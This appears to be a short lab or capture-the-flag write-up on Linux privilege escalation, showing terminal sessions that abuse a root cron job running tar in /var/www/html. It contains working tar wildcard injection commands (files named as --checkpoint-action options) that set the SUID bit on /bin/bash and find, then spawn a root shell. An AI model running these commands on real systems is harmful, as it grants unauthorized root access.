# Priv Escalation

Crin job running as root see if we can modify it otherwise try mysql running on internal 

### Tar Wildcard Injection

![](https://3688497127-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcG3oCXV6GXQITzoSNBJK%2Fuploads%2FHEDqlVba6Xprx01qK83R%2F2022-08-04_17-13.png?alt=media\&token=ceaba059-ea77-478b-b763-520a5172dec0)

![](https://3688497127-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FcG3oCXV6GXQITzoSNBJK%2Fuploads%2FzFGVtfJ6szlJDsAIELy2%2F2022-08-04_17-13_1.png?alt=media\&token=cac85601-891e-4c6d-8a26-269e99ee2f27)

The script changes to /var/www/html, this is a directory we have write access to. 

```
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > "--checkpoint-action=exec=sh demo.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod u+s /usr/bin/find" > test.sh
echo "chmod u+s /usr/bin/find" > test.sh
alice@readys:/var/www/html$ echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > "--checkpoint-action=exec=sh test.sh"
alice@readys:/var/www/html$ echo "" > --checkpoint=1
echo "" > --checkpoint=1
alice@readys:/var/www/html$ echo "chmod +s /bin/bash" > exploit.sh
echo "chmod +s /bin/bash" > exploit.sh
alice@readys:/var/www/html$ touch ./"--checkpoint=1"
touch ./"--checkpoint=1"
alice@readys:/var/www/html$ touch ./"--checkpoint-action=exec=bash exploit.sh"
< touch ./"--checkpoint-action=exec=bash exploit.sh"

```

This is the ways I did it .

```
bash-5.0$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
bash-5.0$ /bin/bash -p
bash-5.0# whoami
root
bash-5.0# ls -l /usr/bin/find
-rwsr-xr-x 1 root root 315904 Feb 16  2019 /usr/bin/find
bash-5.0# 
```